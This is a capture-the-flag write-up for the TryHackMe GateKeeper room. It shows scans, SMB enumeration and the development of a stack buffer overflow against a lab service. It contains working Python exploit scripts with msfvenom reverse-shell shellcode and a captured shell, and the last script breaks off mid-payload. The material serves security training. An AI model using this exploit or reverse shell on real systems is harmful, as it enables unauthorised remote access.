TryHackMe: GateKeeper

TryHackMe: GateKeeper

TryHackMe: GateKeeper by TheMayor

Task 1 Approach the Gates

Deploy the machine when you are ready to release the Gatekeeper.

No Answer Needed

Answer: Not Needed

Task 2 Defeat the Gatekeeper and pass through the fire.

Defeat the Gatekeeper to break the chains. But beware, fire awaits on the other side.

Locate and find the User Flag.

Let's add an entry to /etc/hosts and give the box a scan.

╰─⠠⠵ rustscan -a gatekeeper --ulimit 10000 -- -sC -sV -oA gatekeeper -A
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
😵 https://admin.tryhackme.com

[~] The config file is expected to be at "/home/tony/.rustscan.toml"
[~] Automatically increasing ulimit value to 10000.
Open 10.10.57.137:135
Open 10.10.57.137:139
Open 10.10.57.137:445
Open 10.10.57.137:31337
Open 10.10.57.137:49154
Open 10.10.57.137:49152
Open 10.10.57.137:49153
Open 10.10.57.137:49160
Open 10.10.57.137:49161
Open 10.10.57.137:49162
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

[~] Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-17 23:58 GMT
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 23:58
Completed NSE at 23:58, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 23:58
Completed NSE at 23:58, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 23:58
Completed NSE at 23:58, 0.00s elapsed
Initiating Ping Scan at 23:58
Scanning 10.10.57.137 [2 ports]
Completed Ping Scan at 23:58, 0.03s elapsed (1 total hosts)
Initiating Connect Scan at 23:58
Scanning gatekeeper (10.10.57.137) [10 ports]
Discovered open port 445/tcp on 10.10.57.137
Discovered open port 139/tcp on 10.10.57.137
Discovered open port 135/tcp on 10.10.57.137
Discovered open port 49152/tcp on 10.10.57.137
Discovered open port 49160/tcp on 10.10.57.137
Discovered open port 49153/tcp on 10.10.57.137
Discovered open port 49154/tcp on 10.10.57.137
Discovered open port 49162/tcp on 10.10.57.137
Discovered open port 31337/tcp on 10.10.57.137
Discovered open port 49161/tcp on 10.10.57.137
Completed Connect Scan at 23:58, 0.03s elapsed (10 total ports)
Initiating Service scan at 23:58
Scanning 10 services on gatekeeper (10.10.57.137)
Service scan Timing: About 40.00% done; ETC: 00:01 (0:01:21 remaining)
Completed Service scan at 00:01, 157.14s elapsed (10 services on 1 host)
NSE: Script scanning 10.10.57.137.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 00:01
Completed NSE at 00:01, 5.34s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 00:01
Completed NSE at 00:01, 1.06s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 00:01
Completed NSE at 00:01, 0.00s elapsed
Nmap scan report for gatekeeper (10.10.57.137)
Host is up, received conn-refused (0.030s latency).
Scanned at 2021-03-17 23:58:52 GMT for 164s

PORT      STATE SERVICE      REASON  VERSION
135/tcp   open  msrpc        syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds syn-ack Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
31337/tcp open  Elite?       syn-ack
| fingerprint-strings: 
|   FourOhFourRequest: 
|     Hello GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0
|     Hello
|   GenericLines: 
|     Hello 
|     Hello
|   GetRequest: 
|     Hello GET / HTTP/1.0
|     Hello
|   HTTPOptions: 
|     Hello OPTIONS / HTTP/1.0
|     Hello
|   Help: 
|     Hello HELP
|   Kerberos: 
|     Hello !!!
|   LDAPSearchReq: 
|     Hello 0
|     Hello
|   LPDString: 
|     Hello 
|     default!!!
|   RTSPRequest: 
|     Hello OPTIONS / RTSP/1.0
|     Hello
|   SIPOptions: 
|     Hello OPTIONS sip:nm SIP/2.0
|     Hello Via: SIP/2.0/TCP nm;branch=foo
|     Hello From: <sip:nm@nm>;tag=root
|     Hello To: <sip:nm2@nm2>
|     Hello Call-ID: 50000
|     Hello CSeq: 42 OPTIONS
|     Hello Max-Forwards: 70
|     Hello Content-Length: 0
|     Hello Contact: <sip:nm@nm>
|     Hello Accept: application/sdp
|     Hello
|   SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|_    Hello
49152/tcp open  msrpc        syn-ack Microsoft Windows RPC
49153/tcp open  msrpc        syn-ack Microsoft Windows RPC
49154/tcp open  msrpc        syn-ack Microsoft Windows RPC
49160/tcp open  msrpc        syn-ack Microsoft Windows RPC
49161/tcp open  msrpc        syn-ack Microsoft Windows RPC
49162/tcp open  msrpc        syn-ack Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port31337-TCP:V=7.80%I=7%D=3/17%Time=605297C7%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,24,"Hello\x20GET\x20/\x20HTTP/1\.0\r!!!\nHello\x20\r!!!\n")%r
SF:(SIPOptions,142,"Hello\x20OPTIONS\x20sip:nm\x20SIP/2\.0\r!!!\nHello\x20
SF:Via:\x20SIP/2\.0/TCP\x20nm;branch=foo\r!!!\nHello\x20From:\x20<sip:nm@n
SF:m>;tag=root\r!!!\nHello\x20To:\x20<sip:nm2@nm2>\r!!!\nHello\x20Call-ID:
SF:\x2050000\r!!!\nHello\x20CSeq:\x2042\x20OPTIONS\r!!!\nHello\x20Max-Forw
SF:ards:\x2070\r!!!\nHello\x20Content-Length:\x200\r!!!\nHello\x20Contact:
SF:\x20<sip:nm@nm>\r!!!\nHello\x20Accept:\x20application/sdp\r!!!\nHello\x
SF:20\r!!!\n")%r(GenericLines,16,"Hello\x20\r!!!\nHello\x20\r!!!\n")%r(HTT
SF:POptions,28,"Hello\x20OPTIONS\x20/\x20HTTP/1\.0\r!!!\nHello\x20\r!!!\n"
SF:)%r(RTSPRequest,28,"Hello\x20OPTIONS\x20/\x20RTSP/1\.0\r!!!\nHello\x20\
SF:r!!!\n")%r(Help,F,"Hello\x20HELP\r!!!\n")%r(SSLSessionReq,C,"Hello\x20\
SF:x16\x03!!!\n")%r(TerminalServerCookie,B,"Hello\x20\x03!!!\n")%r(TLSSess
SF:ionReq,C,"Hello\x20\x16\x03!!!\n")%r(Kerberos,A,"Hello\x20!!!\n")%r(Fou
SF:rOhFourRequest,47,"Hello\x20GET\x20/nice%20ports%2C/Tri%6Eity\.txt%2eba
SF:k\x20HTTP/1\.0\r!!!\nHello\x20\r!!!\n")%r(LPDString,12,"Hello\x20\x01de
SF:fault!!!\n")%r(LDAPSearchReq,17,"Hello\x200\x84!!!\nHello\x20\x01!!!\n"
SF:);
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h19m59s, deviation: 2h18m33s, median: 0s
| nbstat: NetBIOS name: GATEKEEPER, NetBIOS user: <unknown>, NetBIOS MAC: 02:43:03:e4:0f:6b (unknown)
| Names:
|   GATEKEEPER<00>       Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|   GATEKEEPER<20>       Flags: <unique><active>
|   WORKGROUP<1e>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
| Statistics:
|   02 43 03 e4 0f 6b 00 00 00 00 00 00 00 00 00 00 00
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_  00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 33128/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 47101/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 55496/udp): CLEAN (Timeout)
|   Check 4 (port 56526/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: gatekeeper
|   NetBIOS computer name: GATEKEEPER\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-03-17T20:01:30-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-03-18T00:01:30
|_  start_date: 2021-03-17T23:50:14

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 00:01
Completed NSE at 00:01, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 00:01
Completed NSE at 00:01, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 00:01
Completed NSE at 00:01, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 164.18 seconds

31337/Elite

Some sort of service, hitting it with a browser we get the below response.

Hello GET / HTTP/1.1
!!!
Hello Host: gatekeeper:31337
!!!
Hello User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0
!!!
Hello Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
!!!
Hello Accept-Language: en-GB,en;q=0.5
!!!
Hello Accept-Encoding: gzip, deflate
!!!
Hello Connection: keep-alive
!!!
Hello Upgrade-Insecure-Requests: 1
!!!
Hello DNT: 1
!!!
Hello Sec-GPC: 1
!!!
Hello Pragma: no-cache
!!!
Hello Cache-Control: no-cache
!!!
Hello 
!!!

445/smb

Let's have a look at the shares on the box

╰─⠠⠵ smbclient -L  //gatekeeper/ 
Enter WORKGROUP\tony's password: 

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	Users           Disk      
SMB1 disabled -- no workgroup available

Ok, lets see if we can browse of these shares

╰─⠠⠵ smbclient   //gatekeeper/ADMIN$ 
Enter WORKGROUP\'s password: 
tree connect failed: NT_STATUS_ACCESS_DENIED

╰─⠠⠵ smbclient   //gatekeeper/C$    
Enter WORKGROUP\'s password: 
tree connect failed: NT_STATUS_ACCESS_DENIED

╰─⠠⠵ smbclient   //gatekeeper/IPC$
Enter WORKGROUP\'s password: 
Try "help" to get a list of possible commands.
smb: \> dir
NT_STATUS_INVALID_PARAMETER listing \*
smb: \> exit

Nothing on the those but we are able to access Users

╰─⠠⠵ smbclient   //gatekeeper/Users
Enter WORKGROUP\tony's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                  DR        0  Fri May 15 02:57:08 2020
  ..                                 DR        0  Fri May 15 02:57:08 2020
  Default                           DHR        0  Tue Jul 14 08:07:31 2009
  desktop.ini                       AHS      174  Tue Jul 14 05:54:24 2009
  Share                               D        0  Fri May 15 02:58:07 2020

		7863807 blocks of size 4096. 3878815 blocks available
smb: \> dir Default\
  .                                 DHR        0  Tue Jul 14 08:07:31 2009
  ..                                DHR        0  Tue Jul 14 08:07:31 2009
  AppData                            DH        0  Tue Jul 14 04:20:08 2009
  Application Data                  DHS        0  Tue Jul 14 06:08:56 2009
  Cookies                           DHS        0  Tue Jul 14 06:08:56 2009
  Desktop                            DR        0  Tue Jul 14 03:34:59 2009
  Documents                          DR        0  Tue Jul 14 06:08:56 2009
  Downloads                          DR        0  Tue Jul 14 03:34:59 2009
  Favorites                          DR        0  Tue Jul 14 03:34:59 2009
  Links                              DR        0  Tue Jul 14 03:34:59 2009
  Local Settings                    DHS        0  Tue Jul 14 06:08:56 2009
  Music                              DR        0  Tue Jul 14 03:34:59 2009
  My Documents                      DHS        0  Tue Jul 14 06:08:56 2009
  NetHood                           DHS        0  Tue Jul 14 06:08:56 2009
  NTUSER.DAT                        AHS   262144  Sun Apr 19 20:51:09 2020
  NTUSER.DAT.LOG                     AH     1024  Tue Apr 12 09:32:10 2011
  NTUSER.DAT.LOG1                    AH   189440  Sun Apr 19 19:52:07 2020
  NTUSER.DAT.LOG2                    AH        0  Tue Jul 14 03:34:08 2009
  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf    AHS    65536  Tue Jul 14 05:45:54 2009
  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms    AHS   524288  Tue Jul 14 05:45:54 2009
  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms    AHS   524288  Tue Jul 14 05:45:54 2009
  Pictures                           DR        0  Tue Jul 14 03:34:59 2009
  PrintHood                         DHS        0  Tue Jul 14 06:08:56 2009
  Recent                            DHS        0  Tue Jul 14 06:08:56 2009
  Saved Games                         D        0  Tue Jul 14 03:34:59 2009
  SendTo                            DHS        0  Tue Jul 14 06:08:56 2009
  Start Menu                        DHS        0  Tue Jul 14 06:08:56 2009
  Templates                         DHS        0  Tue Jul 14 06:08:56 2009
  Videos                             DR        0  Tue Jul 14 03:34:59 2009

		7863807 blocks of size 4096. 3878815 blocks available
smb: \> dir Share
  Share                               D        0  Fri May 15 02:58:07 2020

		7863807 blocks of size 4096. 3878815 blocks available
smb: \> cd Share\
smb: \Share\> dir
  .                                   D        0  Fri May 15 02:58:07 2020
  ..                                  D        0  Fri May 15 02:58:07 2020
  gatekeeper.exe                      A    13312  Mon Apr 20 06:27:17 2020

		7863807 blocks of size 4096. 3878815 blocks available

Under Default it looks like the Default user profile for Windows. Under Share we have gatekeeper.exe which we can download

smb: \Share\> get gatekeeper.exe 
getting file \Share\gatekeeper.exe of size 13312 as gatekeeper.exe (87.2 KiloBytes/sec) (average 87.2 KiloBytes/sec)
smb: \Share\> 

Reversing the Binary

Ok we have gatekeeper.exe so lets boot our Windows box and get Immunity running to start to look for any buffer overflows.

Drop mona.py into the pycommands folder of Immunity C:\Program Files (x86)\Immunity Inc\Immunity Debugger\PyCommands\

Let's run Immunity as Administrator and open up gatekeeper.exe



Great, we get an error, looks like I need to get Visual C Redist from Microsoft. After installation running gatekeeper.exe does not throw the dll error.

This is a fresh install of Windows 7 which is why I was missing the Visual C lib's

We can use nc to connect to our Windows box on the 31337 and test sending some data.

╰─⠠⠵ nc windows 31337
test
Hello test!!!

Ok, now we need to look for an overflow. Let's generate a pattern using pattern_create.rb from Metasploit to see if we can break it.

╰─⠠⠵ /opt/metasploit-framework/embedded/framework/tools/exploit/pattern_create.rb -l 500
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq

Let's now feed this into our service and see what happens

╰─⠠⠵ nc windows 31337                                                                   
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq


Ok, this has appeared to hang the program.... Let's head over to Immunity and see what we have...

We can see Immunity is and we can see that the program has failed

Looking at the top right pane we can see our EIP value of 39654138

Using pattern_offset.rb we can our offset value is 146

╰─⠠⠵ /opt/metasploit-framework/embedded/framework/tools/exploit/pattern_offset.rb -l 500 -q 39654138 
[*] Exact match at offset 146

Using !mona modules we can only see our gatekeeper.exe that has ASLR disabled

Using !mona find -s "\xff\xe4" -m gatekeeper.exe we find 2 possible entry points.

Let's try 080414C3 which we will need to reverse to \xc3\x14\x04\x08

Now we need to find some Bad Chars using the below

 #!/usr/bin/env python3
import socket, sys

ip = "windows" # Or use sys.argv[1] to take cmdline arg
port = 31337 # Or use sys.argv[2] to take cmdline arg
payload = b'A'*146+b'B'*4
badchars = ( b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
b"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
b"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
b"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
b"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
b"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
b"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
b"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
b"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 

print("Attempting to connect to chat server and send payload")
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, port))
    print("Connected")
except Exception as e:
    print("Error Connecting")
    print(e)
    sys.exit(1)
print("Sennding payload")
try:
    print("Sending payload")
    s.send(payload + badchars + b'\r\n') 
except Exception as e:
    print("Error sending data")
    print(e)
    sys.exit(1)

finally:
    print("Closing socket")
    s.close()

Using this we can see we overwrite EIP with 42424242 which is 4xB's

And using the bottom left pane we can figure out what Bad Chars are missing that we can assume we can use.

Using the above information we can generate our exploit.py. Let's create our shellcode using \x01 as a badchar

╰─⠠⠵ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.237 LPORT=4444 -b "\x01" -f c
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of c file: 1500 bytes
unsigned char buf[] = 
"\xdb\xcf\xd9\x74\x24\xf4\x5d\xbb\x3c\x40\x5c\x83\x29\xc9\xb1"
"\x52\x31\x5d\x17\x83\xed\xfc\x03\x61\x53\xbe\x76\x65\xbb\xbc"
"\x79\x95\x3c\xa1\xf0\x70\x0d\xe1\x67\xf1\x3e\xd1\xec\x57\xb3"
"\x9a\xa1\x43\x40\xee\x6d\x64\xe1\x45\x48\x4b\xf2\xf6\xa8\xca"
"\x70\x05\xfd\x2c\x48\xc6\xf0\x2d\x8d\x3b\xf8\x7f\x46\x37\xaf"
"\x6f\xe3\x0d\x6c\x04\xbf\x80\xf4\xf9\x08\xa2\xd5\xac\x03\xfd"
"\xf5\x4f\xc7\x75\xbc\x57\x04\xb3\x76\xec\xfe\x4f\x89\x24\xcf"
"\xb0\x26\x09\xff\x42\x36\x4e\x38\xbd\x4d\xa6\x3a\x40\x56\x7d"
"\x40\x9e\xd3\x65\xe2\x55\x43\x41\x12\xb9\x12\x02\x18\x76\x50"
"\x4c\x3d\x89\xb5\xe7\x39\x02\x38\x27\xc8\x50\x1f\xe3\x90\x03"
"\x3e\xb2\x7c\xe5\x3f\xa4\xde\x5a\x9a\xaf\xf3\x8f\x97\xf2\x9b"
"\x7c\x9a\x0c\x5c\xeb\xad\x7f\x6e\xb4\x05\x17\xc2\x3d\x80\xe0"
"\x25\x14\x74\x7e\xd8\x97\x85\x57\x1f\xc3\xd5\xcf\xb6\x6c\xbe"
"\x0f\x36\xb9\x11\x5f\x98\x12\xd2\x0f\x58\xc3\xba\x45\x57\x3c"
"\xda\x66\xbd\x55\x71\x9d\x56\x9a\x2e\x9d\x4b\x72\x2d\x9d\x82"
"\xdf\xb8\x7b\xce\xcf\xec\xd4\x67\x69\xb5\xae\x16\x76\x63\xcb"
"\x19\xfc\x80\x2c\xd7\xf5\xed\x3e\x80\xf5\xbb\x1c\x07\x09\x16"
"\x08\xcb\x98\xfd\xc8\x82\x80\xa9\x9f\xc3\x77\xa0\x75\xfe\x2e"
"\x1a\x6b\x03\xb6\x65\x2f\xd8\x0b\x6b\xae\xad\x30\x4f\xa0\x6b"
"\xb8\xcb\x94\x23\xef\x85\x42\x82\x59\x64\x3c\x5c\x35\x2e\xa8"
"\x19\x75\xf1\xae\x25\x50\x87\x4e\x97\x0d\xde\x71\x18\xda\xd6"
"\x0a\x44\x7a\x18\xc1\xcc\x8a\x53\x4b\x64\x03\x3a\x1e\x34\x4e"
"\xbd\xf5\x7b\x77\x3e\xff\x03\x8c\x5e\x8a\x06\xc8\xd8\x67\x7b"
"\x41\x8d\x87\x28\x62\x84";

Now using this in our python script we get a shell back in from our test box

 #!/usr/bin/env python3
import socket, sys

ip = "windows" # Or use sys.argv[1] to take cmdline arg
port = 31337 # Or use sys.argv[2] to take cmdline arg
payload = b'A'*146+b'\xc3\x14\x04\x08'+b'\x90'*32
payload += b"\xdb\xcf\xd9\x74\x24\xf4\x5d\xbb\x3c\x40\x5c\x83\x29\xc9\xb1"
payload += b"\x52\x31\x5d\x17\x83\xed\xfc\x03\x61\x53\xbe\x76\x65\xbb\xbc"
payload += b"\x79\x95\x3c\xa1\xf0\x70\x0d\xe1\x67\xf1\x3e\xd1\xec\x57\xb3"
payload += b"\x9a\xa1\x43\x40\xee\x6d\x64\xe1\x45\x48\x4b\xf2\xf6\xa8\xca"
payload += b"\x70\x05\xfd\x2c\x48\xc6\xf0\x2d\x8d\x3b\xf8\x7f\x46\x37\xaf"
payload += b"\x6f\xe3\x0d\x6c\x04\xbf\x80\xf4\xf9\x08\xa2\xd5\xac\x03\xfd"
payload += b"\xf5\x4f\xc7\x75\xbc\x57\x04\xb3\x76\xec\xfe\x4f\x89\x24\xcf"
payload += b"\xb0\x26\x09\xff\x42\x36\x4e\x38\xbd\x4d\xa6\x3a\x40\x56\x7d"
payload += b"\x40\x9e\xd3\x65\xe2\x55\x43\x41\x12\xb9\x12\x02\x18\x76\x50"
payload += b"\x4c\x3d\x89\xb5\xe7\x39\x02\x38\x27\xc8\x50\x1f\xe3\x90\x03"
payload += b"\x3e\xb2\x7c\xe5\x3f\xa4\xde\x5a\x9a\xaf\xf3\x8f\x97\xf2\x9b"
payload += b"\x7c\x9a\x0c\x5c\xeb\xad\x7f\x6e\xb4\x05\x17\xc2\x3d\x80\xe0"
payload += b"\x25\x14\x74\x7e\xd8\x97\x85\x57\x1f\xc3\xd5\xcf\xb6\x6c\xbe"
payload += b"\x0f\x36\xb9\x11\x5f\x98\x12\xd2\x0f\x58\xc3\xba\x45\x57\x3c"
payload += b"\xda\x66\xbd\x55\x71\x9d\x56\x9a\x2e\x9d\x4b\x72\x2d\x9d\x82"
payload += b"\xdf\xb8\x7b\xce\xcf\xec\xd4\x67\x69\xb5\xae\x16\x76\x63\xcb"
payload += b"\x19\xfc\x80\x2c\xd7\xf5\xed\x3e\x80\xf5\xbb\x1c\x07\x09\x16"
payload += b"\x08\xcb\x98\xfd\xc8\x82\x80\xa9\x9f\xc3\x77\xa0\x75\xfe\x2e"
payload += b"\x1a\x6b\x03\xb6\x65\x2f\xd8\x0b\x6b\xae\xad\x30\x4f\xa0\x6b"
payload += b"\xb8\xcb\x94\x23\xef\x85\x42\x82\x59\x64\x3c\x5c\x35\x2e\xa8"
payload += b"\x19\x75\xf1\xae\x25\x50\x87\x4e\x97\x0d\xde\x71\x18\xda\xd6"
payload += b"\x0a\x44\x7a\x18\xc1\xcc\x8a\x53\x4b\x64\x03\x3a\x1e\x34\x4e"
payload += b"\xbd\xf5\x7b\x77\x3e\xff\x03\x8c\x5e\x8a\x06\xc8\xd8\x67\x7b"
payload += b"\x41\x8d\x87\x28\x62\x84"


print("Attempting to connect to chat server and send payload")
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, port))
    print("Connected")
except Exception as e:
    print("Error Connecting")
    print(e)
    sys.exit(1)
print("Sennding payload")
try:
    print("Sending payload")
    s.send(payload + b'\r\n') 
except Exception as e:
    print("Error sending data")
    print(e)
    sys.exit(1)

finally:
    print("Closing socket")
    s.close()
╰─⠠⠵ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 192.168.0.92 49180
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\tryhackme\Desktop>

Now we regenerate the payload to use our VPN address and run it against the real box. Took me a while but after reading the write-up found we need to use \x00\x0a as bad chars on the actual box.... even though \x01 worked on our test box.

─⠠⠵ msfvenom -p windows/shell_reverse_tcp LHOST=10.9.5.198 LPORT=5555 -b "\x00\x0a" -f c

#!/usr/bin/env python3
import socket, sys

ip = "gatekeeper" # Or use sys.argv[1] to take cmdline arg
port = 31337 # Or use sys.argv[2] to take cmdline arg
payload = b'\x90'*146+b'\xc3\x14\x04\x08'+b"B"*10
payload += b"\xd9\xee\xd9\x74\x24\xf4\x5b\xb8\x46\x70\xc7\x98\x29\xc9\xb1"
payload += b"\x52\x83\xc3\x04\x31\x43\x13\x03\x05\x63\x25\x6d\x75\x6b\x2b"
payload += b"\x8e\x85\x6c\x4c\x06\x60\x5d\x4c\x7c\xe1\xce\x7c\xf6\xa7\xe2"
payload += b"\xf7\x5a\x53\x70\x75\x73\x54\x31\x30\xa5\x5b\xc2\x69\x95\xfa"
payload += b"\x40\x70\xca\xdc\x79\xbb\x1f\x1d\xbd\xa6\xd2\x4f\x16\xac\x41"
payload += b"\x7f\x13\xf8\x59\xf4\x6f\xec\xd9\xe9\x38\x0f\xcb\xbc\x33\x56"
payload += b"\xcb\x3f\x97\xe2\x42\x27\xf4\xcf\x1d\xdc\xce\xa4\x9f\x34\x1f"
payload += b"\x44\x33\x79\xaf\xb7\x4d\xbe\x08\x28\x38\xb6\x6a\xd5\x3b\x0d"
payload += b"\x10\x01\xc9\x95\xb2\xc2\x69\x71\x42\x06\xef\xf2\x48\xe3\x7b"
payload += b"\x5c\x4d\xf2\xa8\xd7\x69\x7f\x4f\x37\xf8\x3b\x74\x93\xa0\x98"
payload += b"\x15\x82\x0c\x4e\x29\xd4\xee\x2f\x8f\x9f\x03\x3b\xa2\xc2\x4b"
payload += b"\x88\x8f\xfc\x8b\x86\x98\x8f\xb9\x09\x33\x07\xf2\xc2\x9d\xd0"
